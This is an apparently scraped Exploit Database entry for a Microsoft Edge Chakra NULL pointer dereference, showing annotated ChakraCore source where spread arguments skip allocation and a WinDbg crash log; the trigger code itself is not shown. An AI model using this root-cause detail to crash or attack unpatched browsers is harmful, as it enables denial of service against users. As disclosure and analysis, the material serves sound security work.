Microsoft Edge Chakra – NULL Pointer Dereference

Exploit Database
111 阅读

作者： Huang Anwen

日期： 2017-08-17
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/42467/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

<!--

Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team

The issue could lead a nullptr derefrence besides a stack overflow we metioned previously.

// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp

Js::ArgSlot EmitArgList(

ParseNode *pnode,

Js::RegSlot rhsLocation,

Js::RegSlot thisLocation,

Js::RegSlot newTargetLocation,

BOOL fIsEval,

BOOL fAssignRegs,

ByteCodeGenerator *byteCodeGenerator,

FuncInfo *funcInfo,

Js::ProfileId callSiteId,

uint16 spreadArgCount = 0,

Js::AuxArray<uint32> **spreadIndices = nullptr)

{

// This function emits the arguments for a call.

// ArgOut's with uses immediately following defs.

EmitArgListStart(thisLocation, byteCodeGenerator, funcInfo, callSiteId);

Js::RegSlot evalLocation = Js::Constants::NoRegister;

// If Emitting arguments for eval and assigning registers, get a tmpLocation for eval.

// This would be used while generating frameDisplay in EmitArgListEnd.

if (fIsEval)

{

evalLocation = funcInfo->AcquireTmpRegister();

}

if (spreadArgCount > 0) //spreadArgCount==0 because of overflow****

{

const size_t extraAlloc = spreadArgCount * sizeof(uint32);

Assert(spreadIndices != nullptr);

*spreadIndices = AnewPlus(byteCodeGenerator->GetAllocator(), extraAlloc, Js::AuxArray<uint32>, spreadArgCount);//skip initialization of spreadIndices****

}

size_t argIndex = EmitArgs(pnode, fAssignRegs, byteCodeGenerator, funcInfo, callSiteId, spreadIndices == nullptr ? nullptr : *spreadIndices);

Js::ArgSlot argumentsCount = EmitArgListEnd(pnode, rhsLocation, thisLocation, evalLocation, newTargetLocation, byteCodeGenerator, funcInfo, argIndex, callSiteId);

if (fIsEval)

{

funcInfo->ReleaseTmpRegister(evalLocation);

}

return argumentsCount;

}

// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp

size_t EmitArgs(

ParseNode *pnode,

BOOL fAssignRegs,

ByteCodeGenerator *byteCodeGenerator,

FuncInfo *funcInfo,

Js::ProfileId callSiteId,

Js::AuxArray<uint32> *spreadIndices = nullptr

)

{

Js::ArgSlot argIndex = 0;

Js::ArgSlot spreadIndex = 0;

if (pnode != nullptr)

{

while (pnode->nop == knopList)

{

// If this is a put, the arguments have already been evaluated (see EmitReference).

// We just need to emit the ArgOut instructions.

if (fAssignRegs)

{

Emit(pnode->sxBin.pnode1, byteCodeGenerator, funcInfo, false);

}

if (pnode->sxBin.pnode1->nop == knopEllipsis)

{

Assert(spreadIndices != nullptr);

spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this' //nullptr derefrence****

EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->sxBin.pnode1->location, callSiteId, argIndex);

}

else

{

byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->sxBin.pnode1->location, callSiteId);

}

if (fAssignRegs)

{

funcInfo->ReleaseLoc(pnode->sxBin.pnode1);

}

pnode = pnode->sxBin.pnode2;

}

// If this is a put, the call target has already been evaluated (see EmitReference).

if (fAssignRegs)

{

Emit(pnode, byteCodeGenerator, funcInfo, false);

}

if (pnode->nop == knopEllipsis)

{

Assert(spreadIndices != nullptr);

spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this'

EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->location, callSiteId, argIndex);

}

else

{

byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->location, callSiteId);

}

if (fAssignRegs)

{

funcInfo->ReleaseLoc(pnode);

}

return argIndex;

}

Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64

*** wait with pending attach

Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols

Executable search path is:

ModLoad: 00007ff6<code>56460000 00007ff6</code>56485000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

ModLoad: 00007ffd<code>4cba0000 00007ffd</code>4cd7b000 C:\Windows\SYSTEM32\ntdll.dll

ModLoad: 00007ffd<code>4ad90000 00007ffd</code>4ae3e000 C:\Windows\System32\KERNEL32.DLL

ModLoad: 00007ffd<code>49c00000 00007ffd</code>49e49000 C:\Windows\System32\KERNELBASE.dll

ModLoad: 00007ffd<code>475e0000 00007ffd</code>4765e000 C:\Windows\SYSTEM32\apphelp.dll

ModLoad: 00007ffd<code>4a1a0000 00007ffd</code>4a499000 C:\Windows\System32\combase.dll

ModLoad: 00007ffd<code>499b0000 00007ffd</code>49aa6000 C:\Windows\System32\ucrtbase.dll

ModLoad: 00007ffd<code>4b250000 00007ffd</code>4b375000 C:\Windows\System32\RPCRT4.dll

ModLoad: 00007ffd<code>49eb0000 00007ffd</code>49f1a000 C:\Windows\System32\bcryptPrimitives.dll

ModLoad: 00007ffd<code>4a100000 00007ffd</code>4a19d000 C:\Windows\System32\msvcrt.dll

ModLoad: 00007ffd<code>43c40000 00007ffd</code>43ca0000 C:\Windows\SYSTEM32\wincorlib.DLL

ModLoad: 00007ffd<code>4b380000 00007ffd</code>4b440000 C:\Windows\System32\OLEAUT32.dll

ModLoad: 00007ffd<code>49b60000 00007ffd</code>49bfa000 C:\Windows\System32\msvcp_win.dll

ModLoad: 00007ffd<code>490a0000 00007ffd</code>490b1000 C:\Windows\System32\kernel.appcore.dll

ModLoad: 00007ffd<code>2c870000 00007ffd</code>2cc34000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll

ModLoad: 00007ffd<code>492b0000 00007ffd</code>499a2000 C:\Windows\System32\Windows.Storage.dll

ModLoad: 00007ffd<code>4b4f0000 00007ffd</code>4b591000 C:\Windows\System32\advapi32.dll

ModLoad: 00007ffd<code>4b1f0000 00007ffd</code>4b249000 C:\Windows\System32\sechost.dll

ModLoad: 00007ffd<code>4cb40000 00007ffd</code>4cb91000 C:\Windows\System32\shlwapi.dll

ModLoad: 00007ffd<code>4a8e0000 00007ffd</code>4a907000 C:\Windows\System32\GDI32.dll

ModLoad: 00007ffd<code>49f20000 00007ffd</code>4a0a8000 C:\Windows\System32\gdi32full.dll

ModLoad: 00007ffd<code>4c9f0000 00007ffd</code>4cb3a000 C:\Windows\System32\USER32.dll

ModLoad: 00007ffd<code>41cb0000 00007ffd</code>41f36000 C:\Windows\SYSTEM32\iertutil.dll

ModLoad: 00007ffd<code>490c0000 00007ffd</code>490de000 C:\Windows\System32\win32u.dll

ModLoad: 00007ffd<code>4a9c0000 00007ffd</code>4aa6a000 C:\Windows\System32\shcore.dll

ModLoad: 00007ffd<code>49030000 00007ffd</code>4907c000 C:\Windows\System32\powrprof.dll

ModLoad: 00007ffd<code>49010000 00007ffd</code>49025000 C:\Windows\System32\profapi.dll

ModLoad: 00007ffd<code>48310000 00007ffd</code>48341000 C:\Windows\SYSTEM32\ntmarta.dll

ModLoad: 00007ffd<code>48f10000 00007ffd</code>48f39000 C:\Windows\SYSTEM32\USERENV.dll

ModLoad: 00007ffd<code>486a0000 00007ffd</code>48744000 C:\Windows\SYSTEM32\DNSAPI.dll

ModLoad: 00007ffd<code>4b030000 00007ffd</code>4b09c000 C:\Windows\System32\WS2_32.dll

ModLoad: 00007ffd<code>4a9b0000 00007ffd</code>4a9b8000 C:\Windows\System32\NSI.dll

ModLoad: 00007ffd<code>38c70000 00007ffd</code>38c96000 C:\Windows\SYSTEM32\clipc.dll

ModLoad: 00007ffd<code>48a60000 00007ffd</code>48a77000 C:\Windows\SYSTEM32\cryptsp.dll

ModLoad: 00007ffd<code>4b4a0000 00007ffd</code>4b4cd000 C:\Windows\System32\IMM32.DLL

ModLoad: 00007ffd<code>48660000 00007ffd</code>48697000 C:\Windows\SYSTEM32\IPHLPAPI.DLL

ModLoad: 00007ffd<code>479c0000 00007ffd</code>47b30000 C:\Windows\SYSTEM32\twinapi.appcore.dll

ModLoad: 00007ffd<code>48ee0000 00007ffd</code>48f05000 C:\Windows\SYSTEM32\bcrypt.dll

ModLoad: 00007ffd<code>48140000 00007ffd</code>48161000 C:\Windows\SYSTEM32\profext.dll

ModLoad: 00007ffd<code>38a20000 00007ffd</code>38a94000 C:\Windows\SYSTEM32\msiso.dll

ModLoad: 00007ffd<code>3e660000 00007ffd</code>3e682000 C:\Windows\SYSTEM32\EShims.dll

ModLoad: 00007ffd<code>3d710000 00007ffd</code>3d72b000 C:\Windows\SYSTEM32\MPR.dll

ModLoad: 00007ffd<code>4b0a0000 00007ffd</code>4b1e5000 C:\Windows\System32\ole32.dll

ModLoad: 00007ffd<code>47830000 00007ffd</code>478c5000 C:\Windows\system32\uxtheme.dll

ModLoad: 00007ffd<code>379c0000 00007ffd</code>37a61000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll

ModLoad: 00007ffd<code>2df90000 00007ffd</code>2f641000 C:\Windows\SYSTEM32\edgehtml.dll

ModLoad: 00007ffd<code>2d730000 00007ffd</code>2df1b000 C:\Windows\SYSTEM32\chakra.dll

ModLoad: 00007ffd<code>45500000 00007ffd</code>45639000 C:\Windows\SYSTEM32\wintypes.dll

ModLoad: 00007ffd<code>3e0a0000 00007ffd</code>3e0df000 C:\Windows\SYSTEM32\MLANG.dll

ModLoad: 00007ffd<code>45c20000 00007ffd</code>45c96000 C:\Windows\SYSTEM32\policymanager.dll

ModLoad: 00007ffd<code>45b90000 00007ffd</code>45c1f000 C:\Windows\SYSTEM32\msvcp110_win.dll

ModLoad: 00007ffd<code>45fb0000 00007ffd</code>46146000 C:\Windows\SYSTEM32\PROPSYS.dll

ModLoad: 00007ffd<code>39b50000 00007ffd</code>39c1b000 C:\Windows\System32\ieproxy.dll

ModLoad: 00007ffd<code>436b0000 00007ffd</code>437b6000 C:\Windows\System32\Windows.UI.dll

ModLoad: 00007ffd<code>435e0000 00007ffd</code>43662000 C:\Windows\SYSTEM32\TextInputFramework.dll

ModLoad: 00007ffd<code>46eb0000 00007ffd</code>46f93000 C:\Windows\SYSTEM32\CoreMessaging.dll

ModLoad: 00007ffd<code>44b90000 00007ffd</code>44e62000 C:\Windows\SYSTEM32\CoreUIComponents.dll

ModLoad: 00007ffd<code>45b70000 00007ffd</code>45b85000 C:\Windows\SYSTEM32\usermgrcli.dll

ModLoad: 00007ffd<code>44040000 00007ffd</code>44571000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll

ModLoad: 00007ffd<code>4b5a0000 00007ffd</code>4c9d7000 C:\Windows\System32\shell32.dll

ModLoad: 00007ffd<code>4a0b0000 00007ffd</code>4a0f9000 C:\Windows\System32\cfgmgr32.dll

ModLoad: 00007ffd<code>46150000 00007ffd</code>4617a000 C:\Windows\SYSTEM32\dwmapi.dll

ModLoad: 00007ffd<code>39200000 00007ffd</code>3952e000 C:\Windows\SYSTEM32\WININET.dll

ModLoad: 00007ffd<code>4ac20000 00007ffd</code>4ad86000 C:\Windows\System32\msctf.dll

ModLoad: 00007ffd<code>48f40000 00007ffd</code>48f70000 C:\Windows\SYSTEM32\SspiCli.dll

ModLoad: 00007ffd<code>43860000 00007ffd</code>43962000 C:\Windows\SYSTEM32\mrmcorer.dll

ModLoad: 00007ffd<code>36760000 00007ffd</code>36770000 C:\Windows\SYSTEM32\tokenbinding.dll

ModLoad: 00007ffd<code>43ba0000 00007ffd</code>43c09000 C:\Windows\SYSTEM32\Bcp47Langs.dll

ModLoad: 00007ffd<code>396b0000 00007ffd</code>396cb000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll

ModLoad: 00007ffd<code>400d0000 00007ffd</code>401a7000 C:\Windows\SYSTEM32\winhttp.dll

ModLoad: 00007ffd<code>488c0000 00007ffd</code>4891c000 C:\Windows\system32\mswsock.dll

ModLoad: 00007ffd<code>42450000 00007ffd</code>4245b000 C:\Windows\SYSTEM32\WINNSI.DLL

ModLoad: 00007ffd<code>41940000 00007ffd</code>41b08000 C:\Windows\SYSTEM32\urlmon.dll

ModLoad: 00007ffd<code>48a80000 00007ffd</code>48a8b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL

ModLoad: 00007ffd<code>36f20000 00007ffd</code>36f3a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll

ModLoad: 00007ffd<code>38ae0000 00007ffd</code>38c6a000 C:\Windows\SYSTEM32\ieapfltr.dll

ModLoad: 00007ffd<code>47670000 00007ffd</code>4768d000 C:\Windows\System32\rmclient.dll

ModLoad: 00007ffd<code>34410000 00007ffd</code>34457000 C:\Windows\system32\dataexchange.dll

ModLoad: 00007ffd<code>46fa0000 00007ffd</code>470c2000 C:\Windows\SYSTEM32\dcomp.dll

ModLoad: 00007ffd<code>46620000 00007ffd</code>468ff000 C:\Windows\SYSTEM32\d3d11.dll

ModLoad: 00007ffd<code>47e80000 00007ffd</code>47f24000 C:\Windows\SYSTEM32\dxgi.dll

ModLoad: 00007ffd<code>35bb0000 00007ffd</code>35bc8000 C:\Windows\System32\UiaManager.dll

ModLoad: 00007ffd<code>37e60000 00007ffd</code>37ee2000 C:\Windows\system32\twinapi.dll

ModLoad: 00007ffd<code>2d700000 00007ffd</code>2d728000 C:\Windows\SYSTEM32\srpapi.dll

ModLoad: 00007ffd<code>490e0000 00007ffd</code>492a9000 C:\Windows\System32\CRYPT32.dll

ModLoad: 00007ffd<code>49080000 00007ffd</code>49091000 C:\Windows\System32\MSASN1.dll

ModLoad: 00007ffd<code>30870000 00007ffd</code>308ea000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll

ModLoad: 00007ffd<code>385b0000 00007ffd</code>3860d000 C:\Windows\SYSTEM32\ninput.dll

ModLoad: 00007ffd<code>46900000 00007ffd</code>46ea4000 C:\Windows\SYSTEM32\d2d1.dll

ModLoad: 00007ffd<code>40390000 00007ffd</code>4064f000 C:\Windows\SYSTEM32\DWrite.dll

ModLoad: 00007ffd<code>30470000 00007ffd</code>304ca000 C:\Windows\System32\Windows.Graphics.dll

ModLoad: 00007ffd<code>2d6f0000 00007ffd</code>2d6ff000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll

ModLoad: 00007ffd<code>448a0000 00007ffd</code>448e2000 C:\Windows\SYSTEM32\vm3dum64.dll

ModLoad: 00007ffd<code>44680000 00007ffd</code>446e7000 C:\Windows\SYSTEM32\D3D10Level9.dll

ModLoad: 00007ffd<code>37780000 00007ffd</code>377eb000 C:\Windows\System32\oleacc.dll

ModLoad: 00007ffd<code>2d6e0000 00007ffd</code>2d6f0000 C:\Windows\system32\msimtf.dll

ModLoad: 00007ffd<code>40030000 00007ffd</code>400b8000 C:\Windows\system32\directmanipulation.dll

ModLoad: 00007ffd<code>39af0000 00007ffd</code>39b04000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll

ModLoad: 00007ffd<code>3f270000 00007ffd</code>3f2a8000 C:\Windows\System32\smartscreenps.dll

ModLoad: 00007ffd<code>377f0000 00007ffd</code>379b5000 C:\Windows\System32\uiautomationcore.dll

ModLoad: 00007ffd<code>40200000 00007ffd</code>40388000 C:\Windows\SYSTEM32\windows.globalization.dll

(18bc.14e0): Access violation - code c0000005 (!!! second chance !!!)

chakra!EmitArgs+0xddda3:

00007ffd<code>2da3132f 41894c8504mov dword ptr [r13+rax*4+4],ecx ds:00000000</code>00000004=????????

0:016> r

rax=0000000000000000 rbx=0000006a8f7faeb0 rcx=0000000000000001

rdx=0000019df75e3040 rsi=0000000000000002 rdi=0000006a8f7fa9c0

rip=00007ffd2da3132f rsp=0000006a8f7fb0f0 rbp=0000006a8f7fb8f0

r8=0000000000000000r9=0000000000000000 r10=0000000000000009

r11=0000019df75ff04d r12=0000000000000001 r13=0000000000000000

r14=0000006a8f7fb8f0 r15=0000000000000000

iopl=0 nv up ei pl nz na pe nc

cs=0033ss=002bds=002bes=002bfs=0053gs=002b efl=00010200

chakra!EmitArgs+0xddda3:

00007ffd<code>2da3132f 41894c8504mov dword ptr [r13+rax*4+4],ecx ds:00000000</code>00000004=????????

0:016> ub

chakra!EmitArgListEnd+0xdde2c:

00007ffd<code>2da3130c 0f856022f2ffjne chakra!EmitArgListEnd+0x92 (00007ffd</code>2d953572)

00007ffd<code>2da31312 0fb7c6movzx eax,si

00007ffd</code>2da31315 e95b22f2ffjmp chakra!EmitArgListEnd+0x95 (00007ffd<code>2d953575)

00007ffd</code>2da3131a 410fb7c4movzx eax,r12w

00007ffd<code>2da3131e 664403e2add r12w,dx

00007ffd</code>2da31322 0fb7cfmovzx ecx,di

00007ffd<code>2da31325 03caadd ecx,edx

00007ffd</code>2da31327 488b942498000000 mov rdx,qword ptr [rsp+98h]

0:016> u

chakra!EmitArgs+0xddda3:

00007ffd<code>2da3132f 41894c8504mov dword ptr [r13+rax*4+4],ecx

00007ffd</code>2da31334 488d4c2440lea rcx,[rsp+40h]

00007ffd<code>2da31339 488b4328mov rax,qword ptr [rbx+28h]

00007ffd</code>2da3133d 48894c2420mov qword ptr [rsp+20h],rcx

00007ffd<code>2da31342 488bcdmov rcx,rbp

00007ffd</code>2da31345 448b400cmov r8d,dword ptr [rax+0Ch]

00007ffd<code>2da31349 e8229c2300callchakra!EmitSpreadArgToListBytecodeInstr (00007ffd</code>2dc6af70)

00007ffd<code>2da3134e 0fb77c2440movzx edi,word ptr [rsp+40h]

0:016> kb

RetAddr : Args to Child : Call Site

00007ffd</code>2d953484 : 0000019d<code>f64e8aa0 00007ffd</code>00000001 0000006a<code>8f7fb8f0 0000019d</code>f75e3040 : chakra!EmitArgs+0xddda3

00007ffd<code>2d952850 : 0000019d</code>f64e8aa0 0000019d<code>ffffffff 0000019d</code>ffffffff 0000006a<code>ffffffff : chakra!EmitArgList+0x9c

00007ffd</code>2d8d3768 : 0000019d<code>f64e8940 0000006a</code>8f7fb8f0 0000019d<code>f75e3040 00000000</code>00000000 : chakra!EmitNew+0x16c

00007ffd<code>2d8d2c55 : 0000019d</code>f64e8940 0000006a<code>8f7fb8f0 0000019d</code>f75e3040 00000000<code>00000000 : chakra!Emit+0x15d8

00007ffd</code>2d8dd790 : 0000019d<code>f64e8810 0000006a</code>8f7fb8f0 0000019d<code>f75e3040 0000006a</code>00000001 : chakra!Emit+0xac5

00007ffd<code>2d8db4b9 : 0000006a</code>8f7fb8f0 0000019d<code>f64e8810 0000019d</code>f75e3040 0000006a<code>00000001 : chakra!ByteCodeGenerator::EmitTopLevelStatement+0x80

00007ffd</code>2d8daee5 : 0000006a<code>8f7fb8f0 0000019d</code>f75e3040 00000000<code>00000000 0000019d</code>f75e3040 : chakra!ByteCodeGenerator::EmitGlobalBody+0x75

00007ffd<code>2d8da274 : 0000006a</code>8f7fb8f0 0000019d<code>f64e8030 0000019d</code>f75e3030 0000006a<code>8f7fb8f0 : chakra!ByteCodeGenerator::EmitOneFunction+0xa75

00007ffd</code>2d9826aa : 0000006a<code>8f7fb8f0 0000019d</code>f64e8030 00000000<code>00000000 0000006a</code>8f7fb8f0 : chakra!ByteCodeGenerator::EmitScopeList+0x164

00007ffd<code>2d982541 : 0000019d</code>f64e8030 0000019d<code>00003c22 0000006a</code>8f7fb8f0 0000006a<code>8f7fbb30 : chakra!ByteCodeGenerator::Generate+0x142

00007ffd</code>2d7a2820 : 0000019d<code>f64e8030 0000019d</code>00003c22 0000019d<code>f2b2d110 0000006a</code>8f7fbb30 : chakra!GenerateByteCode+0x8d

00007ffd<code>2d748201 : 0000019d</code>f2b2d110 0000019d<code>f67c0020 0000019d</code>00050022 0000006a<code>00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x380

00007ffd</code>2d747fb8 : 0000019d<code>f6260000 00007ffd</code>2de79f80 0000019d<code>00000000 0000019d</code>f625c000 : chakra!Js::GlobalObject::VEval+0x231

00007ffd<code>2d747ecd : 0000006a</code>8f7fc0d0 0000019d<code>f625b5c0 0000019d</code>f2b2a150 0000006a<code>8f7fc090 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8

00007ffd</code>2d9a6be3 : 0000019d<code>f625b5c0 00000000</code>18000003 0000019d<code>f6270020 0000019d</code>f628ef00 : chakra!Js::GlobalObject::EntryEval+0x7d

00007ffd<code>2d896bf3 : 0000019d</code>f2b2a150 00000000<code>00000018 0000006a</code>8f7fc330 00000000<code>00000006 : chakra!amd64_CallFunction+0x93

00007ffd</code>2d7571ac : 0000019d<code>f625b5c0 00007ffd</code>2d747e50 0000006a<code>8f7fc1a0 0000006a</code>8f7fc330 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83

00007ffd<code>2d7577b4 : 0000006a</code>8f7fc330 0000019d<code>f64e009a 0000019d</code>f625b5c0 00007ffd<code>00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114

00007ffd</code>2d834920 : 0000006a<code>8f7fc330 0000019d</code>f64e009a 0000019d<code>8f7fc330 0000019d</code>f64e00a8 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c

00007ffd<code>2d82ff2c : 0000006a</code>8f7fc330 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250

00007ffd</code>2d8c80cc : 0000006a<code>8f7fc330 0000019d</code>f64c0000 0000006a<code>8f7fc4f0 00007ffd</code>4cc05401 : chakra!Js::InterpreterStackFrame::Process+0x12c

00007ffd<code>2d8c7be1 : 0000019d</code>f6280420 0000006a<code>8f7fc6d0 0000019d</code>f6500fc2 0000006a<code>8f7fc6e8 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac

0000019d</code>f6500fc2 : 0000006a<code>8f7fc720 00000000</code>00000000 00000000<code>00000000 00007ffd</code>2d9a6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51

00007ffd<code>2d9a6be3 : 0000019d</code>f6280420 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 : 0x19d</code>f6500fc2

00007ffd<code>2d896bf3 : 0000019d</code>f2b2a150 00000000<code>00000000 0000019d</code>f2b50c00 00007ffd<code>2d8aa837 : chakra!amd64_CallFunction+0x93

00007ffd</code>2d8c1810 : 0000019d<code>f6280420 00007ffd</code>2d9a6df0 0000006a<code>8f7fc820 0000019d</code>f2b2d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83

00007ffd<code>2d8c0a37 : 0000019d</code>f6280420 0000006a<code>8f7fc910 0000019d</code>f2b2d110 00007ffd<code>4a167100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100

00007ffd</code>2d98907e : 0000019d<code>f6280420 0000006a</code>8f7fc970 0000019d<code>f2b2d110 0000019d</code>f2b2da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b

00007ffd<code>2d8ecd54 : 0000019d</code>f6280420 0000006a<code>8f7fc9b0 00000000</code>00000000 0000006a<code>8f7fc9c8 : chakra!ScriptSite::CallRootFunction+0x6a

00007ffd</code>2d881b49 : 0000019d<code>f2b2d000 0000019d</code>f6280420 0000006a<code>8f7fca60 00000000</code>00000000 : chakra!ScriptSite::Execute+0x124

00007ffd<code>2d882e8e : 0000019d</code>f2b29d00 0000006a<code>8f7fcf68 0000006a</code>8f7fcfa0 0000006a<code>80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5

00007ffd</code>2d883121 : 0000019d<code>f2b29d00 0000019d</code>f370c4c4 00000000<code>00000000 0000019d</code>f2cb4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436

00007ffd<code>2e393c75 : 0000019d</code>f2b29d50 0000019d<code>f370c4c4 0000019d</code>0000008a 00000000<code>00000000 : chakra!ScriptEngine::ParseScriptText+0xb1

00007ffd</code>2e393abe : 00000000<code>00000000 0000006a</code>8f7fce39 0000019d<code>f2cb4260 0000019d</code>00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119

00007ffd<code>2e3935d7 : 00000000</code>00000000 0000019d<code>f2cb4260 0000019d</code>f2c3c1c0 0000019d<code>f2cb41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202

00007ffd</code>2e392f07 : 0000019d<code>f2c50c01 0000019d</code>f2cac100 0000019d<code>00000082 00007ffd</code>00000000 : edgehtml!CScriptData::CommitCode+0x357

00007ffd<code>2e452f8d : 00000000</code>ffffffff 0000019d<code>f2c3c460 00000000</code>ffffffff 00000000<code>00000000 : edgehtml!CScriptData::Execute+0x20f

00007ffd</code>2e2943d4 : 00000000<code>00000000 0000019d</code>f2c8c440 00000000<code>00000001 00007ffd</code>2e44ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d

00007ffd<code>2e2934a1 : 0000019d</code>f2c50c00 00000000<code>00000000 0000019d</code>f2c50c00 0000019d<code>f2c2c8c0 : edgehtml!CHtmParseBase::Execute+0x204

00007ffd</code>2e44d23b : 00000000<code>00019717 0000019d</code>f2c20000 0000019d<code>f2c800b0 0000019d</code>f2c2c8c0 : edgehtml!CHtmPost::Exec+0x1e1

00007ffd<code>2e44d11f : 0000019d</code>f2c2c8c0 00000000<code>00019717 0000019d</code>f37e6dc0 00000000<code>00000000 : edgehtml!CHtmPost::Run+0x2f

00007ffd</code>2e44cfd3 : 0000019d<code>f2c20000 00000000</code>06363701 00000000<code>00000002 0000019d</code>f2c61740 : edgehtml!PostManExecute+0x63

00007ffd<code>2e44ce6d : 0000019d</code>f2c2c8c0 00000000<code>06363729 0000019d</code>00000000 00007ffd<code>41cd4779 : edgehtml!PostManResume+0xa3

00007ffd</code>2e45b353 : 0000019d<code>f2c48600 0000019d</code>f3734bd0 00000000<code>00000000 00000000</code>00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d

00007ffd<code>2e4350db : 0000019d</code>f2c282d0 0000019d<code>f2b25491 0000019d</code>f2b02200 0000006a<code>8f7fd4f0 : edgehtml!CDwnChan::OnMethodCall+0x23

00007ffd</code>2e2c1706 : 0000019d<code>f2b02728 0000019d</code>f2c61740 0000019d<code>f2b02260 0000006a</code>8f7fd520 : edgehtml!GWndAsyncTask::Run+0x1b

00007ffd<code>2e40a860 : 00000000</code>0e877146 0000019d<code>f2c617a0 0000019d</code>f2c800b0 00007ffd<code>2e369138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236

00007ffd</code>2e40a683 : 0000019d<code>f3734bd0 00000000</code>00000000 00000000<code>00000002 0000019d</code>f2c28170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70

00007ffd<code>2e2c22b3 : 0000006a</code>8f7fd9d0 00000000<code>00008002 0000019d</code>f2c28170 00007ffd<code>4ca147df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3

00007ffd</code>2e2c07a5 : 00000000<code>00008002 0000019d</code>f2c20000 000042e1<code>6a33249e 00007ffd</code>2e33721d : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53

00007ffd<code>4c9fbc50 : 00000000</code>00010442 00000000<code>00000001 00000000</code>00000002 00000000<code>80000012 : edgehtml!GlobalWndProc+0x125

00007ffd</code>4c9fb5cf : 00000195<code>f12868c0 00007ffd</code>2e2c0680 00000000<code>00010442 00000000</code>00010442 : USER32!UserCallWinProcCheckWow+0x280

00007ffd<code>2c876d0e : 0000006a</code>8f7fd970 00000000<code>00000000 00000195</code>f0cd3840 00000000<code>00000000 : USER32!DispatchMessageWorker+0x19f

00007ffd</code>2c88eecb : 00000000<code>00000000 00000000</code>00000001 00000195<code>f0f29cd0 00000195</code>f0cc3960 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee

00007ffd<code>38a2b4a8 : 00000000</code>00000000 00000195<code>f0f28990 00000000</code>00000000 00000000<code>00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab

00007ffd</code>4ada2774 : 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 00000000</code>00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48

00007ffd<code>4cc10d61 : 00000000</code>00000000 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 : KERNEL32!BaseThreadInitThunk+0x14

00000000</code>00000000 : 00000000<code>00000000 00000000</code>00000000 00000000<code>00000000 00000000</code>00000000 : ntdll!RtlUserThreadStart+0x21

